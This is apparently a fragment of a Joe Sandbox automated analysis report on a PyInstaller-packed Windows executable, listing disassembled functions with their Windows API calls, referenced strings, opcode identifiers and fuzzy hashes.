                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: %s: %s$Error$Error [ANSI Fallback]$[PYI-%d:ERROR]
                                                                                      • API String ID: 2050909247-2962405886
                                                                                      • Opcode ID: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                      • Instruction ID: d67a4eee5423aefc265e6fa62ea03babe85d61feead22d1ec5c153e67b4c86d0
                                                                                      • Opcode Fuzzy Hash: b3354eec44a94607d33eb4f3788ab89374ba031f66333e1b118589dca889f3f3
                                                                                      • Instruction Fuzzy Hash: CC312862B1968142E790B7A5B8406E7B295BF887D4F800131FEADAB789DF3CD1468390
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                      • String ID: Unhandled exception in script
                                                                                      • API String ID: 3081866767-2699770090
                                                                                      • Opcode ID: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                      • Instruction ID: 7e6a71673e423b3a4212b38f906b364629daf10781857dc4f7c35500625a236b
                                                                                      • Opcode Fuzzy Hash: 1a8653f9ef4157c26f2335c81c204ff7a5d47729ffdf6617f9212c2ec85f79f4
                                                                                      • Instruction Fuzzy Hash: 03319272619A8285EBA4EBB1E8542F9B360FF88784F840135EE5D5BB89DF3CD141C750
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,FFFFFFFF,00000000,00007FF7F3DD918F,?,00007FF7F3DD3C55), ref: 00007FF7F3DD2BA0
                                                                                      • MessageBoxW.USER32 ref: 00007FF7F3DD2C2A
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentMessageProcess
                                                                                      • String ID: WARNING$Warning$[PYI-%d:%ls]
                                                                                      • API String ID: 1672936522-3797743490
                                                                                      • Opcode ID: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                      • Instruction ID: 3055df954e2b3d5bd7d7a290782d4073e45d36552c9a0a8594bc5bb4e2f4d773
                                                                                      • Opcode Fuzzy Hash: 4a0b6e8ebe13cae449087f655af1d2523953ec7fd560ce9a50e7097f48d063a1
                                                                                      • Instruction Fuzzy Hash: 7421E562709B4182E751ABA4F8807EAB364FB887C0F800135EE9D6B799DF3CD245C790
                                                                                      APIs
                                                                                      • GetCurrentProcessId.KERNEL32(?,00000000,00000000,?,00000000,00007FF7F3DD1B99), ref: 00007FF7F3DD2760
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentProcess
                                                                                      • String ID: ERROR$Error$Error [ANSI Fallback]$[PYI-%d:%s]
                                                                                      • API String ID: 2050909247-1591803126
                                                                                      • Opcode ID: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                      • Instruction ID: 567157e596f86f5239f0376b56b1dbb57d0e5dc230794ac905fcb71b7fdcb9ab
                                                                                      • Opcode Fuzzy Hash: a4fe537d534c2fb53088f6f6b76b448a80ccad2508d4dc842b27f1a8247accfc
                                                                                      • Instruction Fuzzy Hash: 8F21A67261978152E7A0ABA1F8817E6B394EF883C0F800135FE9D67699DF3CD1458790
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                      • API String ID: 4061214504-1276376045
                                                                                      • Opcode ID: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                      • Instruction ID: 3407cf8a558331a01aeb401f858656d33aa12e054d4b196cec205c9ccbf1a42e
                                                                                      • Opcode Fuzzy Hash: b239dd027a539e56a716c05e535b4da9cb8e2339e08a4dc57142401ef2416000
                                                                                      • Instruction Fuzzy Hash: 49F0C861B0A70681EB94ABA0E48473A9760FF45764F840335C97E5E1E8CF3CD084C3A0
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _set_statfp
                                                                                      • String ID:
                                                                                      • API String ID: 1156100317-0
                                                                                      • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                      • Instruction ID: 7bd888f195acad3f54dca21b5bce1121a1b453f0fb4377b6c8e2670ea6b44924
                                                                                      • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                      • Instruction Fuzzy Hash: CF118622D5CA4381F7E831F5E4D1379A090AF5936CF840634EA7E3E6DE8E7C644141A0
                                                                                      APIs
                                                                                      • FlsGetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3AF
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3CE
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB3F6
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB407
                                                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF7F3DEA5A3,?,?,00000000,00007FF7F3DEA83E,?,?,?,?,?,00007FF7F3DEA7CA), ref: 00007FF7F3DEB418
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                      • Instruction ID: ae4ffe7bfd6d462ffd2f109e2f93de5e328a4a68a7ad24208f5a5b099be51442
                                                                                      • Opcode Fuzzy Hash: 44f6b3e63c936746b9124b5af5da9c753e88c88086b63197a25bc1506e4861c0
                                                                                      • Instruction Fuzzy Hash: B7115E60E0D60241FBDDB3A59542279E9415F447B0FC94334DC7E6EBD6DD2CB48143A2
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: Value
                                                                                      • String ID:
                                                                                      • API String ID: 3702945584-0
                                                                                      • Opcode ID: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                      • Instruction ID: 002245d9623c70b61ea1db2552dc84080bafb52522b8f90d0296bb92c23053a7
                                                                                      • Opcode Fuzzy Hash: 92671db20a050c4f2636db97a8291f7b9cbb2c044339a59ef12305351f814945
                                                                                      • Instruction Fuzzy Hash: 6311F260A0E60741FBEC72A1885227E9A424F85730FC94734D97E6E6C2DD2CB98046F2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: verbose
                                                                                      • API String ID: 3215553584-579935070
                                                                                      • Opcode ID: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                      • Instruction ID: b8ec8516d5bbb46c082a30314a0a77c9678a46eff74ed2d735c5d8fc6e07b228
                                                                                      • Opcode Fuzzy Hash: 8c3a45f75ca5c0a3459ca2e96ae2fbbf181a3d63a640e770f0a7cf37c7606cec
                                                                                      • Instruction Fuzzy Hash: BA910932A0864641F7A9AEA4D45037DBB91AB40B54FC44331DABD6B3D5DF3CE48583A2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                      • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                      • API String ID: 3215553584-1196891531
                                                                                      • Opcode ID: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                      • Instruction ID: 6b25ed96f8289da615756aead5ba728e20c659cdf9cf45904e3ff5b9186b8bcb
                                                                                      • Opcode Fuzzy Hash: 7089664b0a027e884898b454f5d4d61e653d4f3baae8c024cbe23c99275e4c13
                                                                                      • Instruction Fuzzy Hash: 7F81C772D0824285F7ED7EE58140238AEA8AB11B44FD74231D92DBF2C5DB2DF58183A3
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                      • String ID: csm
                                                                                      • API String ID: 2395640692-1018135373
                                                                                      • Opcode ID: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                      • Instruction ID: 8a6fca9462f787b1f4c90fc79f9509dd796580b23ece198b5d92a7beda42b32f
                                                                                      • Opcode Fuzzy Hash: 4bd751ab4a757734da5bac4c310991cbc8ef63d187f18c7a3c34a87046479a0f
                                                                                      • Instruction Fuzzy Hash: 4451B032B196029ADF94AF95D444A38B791FF44B88F908130DA6E5B7C8DF7CE841C7A0
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                      • String ID: csm$csm
                                                                                      • API String ID: 3896166516-3733052814
                                                                                      • Opcode ID: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                      • Instruction ID: 26244831693c7a0feffde000285c480376d94f467af32b59a649e4efba219b37
                                                                                      • Opcode Fuzzy Hash: b828653c103bc27f8420a51a056d9897bfd6e6497fd7c081c32eb92dd3ed2bbb
                                                                                      • Instruction Fuzzy Hash: E051A632A0838286DBB4AFA1D044378B7A8FB55B88F954135DA6C5BBC5CF3CE450C791
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CallEncodePointerTranslator
                                                                                      • String ID: MOC$RCC
                                                                                      • API String ID: 3544855599-2084237596
                                                                                      • Opcode ID: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                      • Instruction ID: b1203d908cccfa1e353a21fb3e2e587374a4184a124dc26d885d84b8effe4fdd
                                                                                      • Opcode Fuzzy Hash: 1c81a5d02d7979dd4dad50f55436adaf5051385037e661534b2c2f58034018d3
                                                                                      • Instruction Fuzzy Hash: 7F61A432908BC585DBB0AB65E4403AAF7A4FB85784F444235EBAC1B795CF7CD194CB50
                                                                                      APIs
                                                                                      • CreateDirectoryW.KERNEL32(00000000,?,00007FF7F3DD352C,?,00000000,00007FF7F3DD3F1B), ref: 00007FF7F3DD7F32
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: CreateDirectory
                                                                                      • String ID: %.*s$%s%c$\
                                                                                      • API String ID: 4241100979-1685191245
                                                                                      • Opcode ID: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                      • Instruction ID: 6e2740a1a2cd88549ffabce37b722be6d868710c6b2f61816188a2c2771d0717
                                                                                      • Opcode Fuzzy Hash: 302ffdc47f1f131389ecc473fe7ae023bae846d875cccfc6523225b15fd92315
                                                                                      • Instruction Fuzzy Hash: 5131E661619AC245EBA1AB60E4507AAF354EF84BE0F840231EE7D5F7C9DF3CD60187A0
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: Message
                                                                                      • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                      • API String ID: 2030045667-255084403
                                                                                      • Opcode ID: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                      • Instruction ID: 181d5bafc080ebaf6f977990e7ba27d40273d7dfe035b4a824d94cd3314f00fa
                                                                                      • Opcode Fuzzy Hash: 035b7a672ed8def45fe49a9c290554376ffedfd07499b26c39d849b73b89d90e
                                                                                      • Instruction Fuzzy Hash: F521F772B08B4181E750ABA4F8807EAB364FB88780F800135EE9D6B799DF3CD245C790
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                      • String ID:
                                                                                      • API String ID: 2718003287-0
                                                                                      • Opcode ID: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                      • Instruction ID: 775f15d9a27788961b64ada9be7e35c628ec14bbc8d5159decfb8c744f359ed0
                                                                                      • Opcode Fuzzy Hash: 04e310725d937c0b27e7ac1e6c46040fced781be2c4963351fe3137ba04acc33
                                                                                      • Instruction Fuzzy Hash: F5D13772B08A418AE754DFB5D4402AC7BB1FB547D8B804236DE6DABBC9DE38D046C390
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_isindst
                                                                                      • String ID:
                                                                                      • API String ID: 4170891091-0
                                                                                      • Opcode ID: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                      • Instruction ID: 5944f08a2ce7b60b00be7a8ce2f2eea3813531f22c2b260dae450e9a6408ce92
                                                                                      • Opcode Fuzzy Hash: 873197461a12b50781dd6dd2a54ab0b7f590f407db75148e336b6c99fa373a01
                                                                                      • Instruction Fuzzy Hash: 19515A72F0461186FB58EFA489512BCBB69BF40358F910335DD3E6AAE4DF38A442C790
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                      • String ID:
                                                                                      • API String ID: 2780335769-0
                                                                                      • Opcode ID: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                      • Instruction ID: 6e00a30a326d8c7af9a40158f2af195df77ab4b489ee80222aa1e68177a140d6
                                                                                      • Opcode Fuzzy Hash: 601044899bb77d1db34704472f686b9691880a3163deed0eb7e9945e8072c835
                                                                                      • Instruction Fuzzy Hash: 8751B562E0464986F794EFB0D4903BD7BA2AB48B98F504634DE1D6F7C9DF38D48083A1
                                                                                      APIs
                                                                                      Similarity
                                                                                      • API ID: LongWindow$DialogInvalidateRect
                                                                                      • String ID:
                                                                                      • API String ID: 1956198572-0
                                                                                      • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                      • Instruction ID: 8dc9915a568aecbff456bd31e0ccc7e5903359a763709003c2c4f3c359694f84
                                                                                      • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                      • Instruction Fuzzy Hash: 40118621A1C54682F7D4A7F9F684279A351EB84784FC88030DE691BBDDCD2DD5D98250
                                                                                      APIs
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                      • String ID: ?
                                                                                      • API String ID: 1286766494-1684325040
                                                                                      • Opcode ID: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                      • Instruction ID: e631e8a3715736c6f5d76e77ee77043f82bce6492aff23112b9f03a0e201ed71
                                                                                      • Opcode Fuzzy Hash: 21862b7f5a6063227688de7d7fc5fbfc7fa1fb1d7946118fe9e576ba790fa6aa
                                                                                      • Instruction Fuzzy Hash: 7F416C12A0828641FBA5ABB5E48137AE752EB80BA4F944234EE7D1FBDDDF3CD4418750
                                                                                      APIs
                                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7F3DE9046
                                                                                        • Part of subcall function 00007FF7F3DEA948: RtlFreeHeap.NTDLL(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA95E
                                                                                        • Part of subcall function 00007FF7F3DEA948: GetLastError.KERNEL32(?,?,?,00007FF7F3DF2D22,?,?,?,00007FF7F3DF2D5F,?,?,00000000,00007FF7F3DF3225,?,?,?,00007FF7F3DF3157), ref: 00007FF7F3DEA968
                                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7F3DDCBA5), ref: 00007FF7F3DE9064
                                                                                      Strings
                                                                                      Similarity
                                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                      • String ID: C:\Users\user\Desktop\aLsxeH29P2.exe
                                                                                      • API String ID: 3580290477-2540427151
                                                                                      • Opcode ID: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                      • Instruction ID: 27b25f9dbd441c33745a9c0feb227a98c74d311c106aa003961c805ad241f776
                                                                                      • Opcode Fuzzy Hash: 136b352ca89953b7aac46d199a587659114d0cf60bae53edf27061cb20026a80
                                                                                      • Instruction Fuzzy Hash: C341A336A0970285EB98FF61D8400BDABA4EF447D4BC54135E95E6BBC5CE3CD4C583A1
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: ErrorFileLastWrite
                                                                                      • String ID: U
                                                                                      • API String ID: 442123175-4171548499
                                                                                      • Opcode ID: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                      • Instruction ID: f4e0e9902a76f38140237504885feb8d14ae327b78fb0be1741b61b015dfc653
                                                                                      • Opcode Fuzzy Hash: 4f5d94246872f2193e537bc66f33c90add5f7e97f4787e66017fcfb3b1ebd6d4
                                                                                      • Instruction Fuzzy Hash: CD41C572B18A4181DBA0AFA5E4443B9BBA0FB88BC4F804131EE5D9B798DF3CD441C790
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2973687343.00007FF7F3DD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F3DD0000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2973667105.00007FF7F3DD0000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973717073.00007FF7F3DFB000.00000002.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973742478.00007FF7F3E12000.00000004.00000001.01000000.00000003.sdmp
                                                                                      • Associated: 00000000.00000002.2973781734.00007FF7F3E14000.00000002.00000001.01000000.00000003.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_7ff7f3dd0000_aLsxeH29P2.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentDirectory
                                                                                      • String ID: :
                                                                                      • API String ID: 1611563598-336475711
                                                                                      • Opcode ID: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                      • Instruction ID: b37029886734000a9d914611960cd5f5a2887ad9afd9775e9a0d01581942454c
                                                                                      • Opcode Fuzzy Hash: 9aa1b1c0966d0181e71a7442aa19fd9d8a3a06258be719e39fc35e3b215e25b0
                                                                                      • Instruction Fuzzy Hash: 20212D72A0868143FB64AB51D04427DB7B5FB84B44FC64139D6AD5B2C4CF7CD58487E2
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
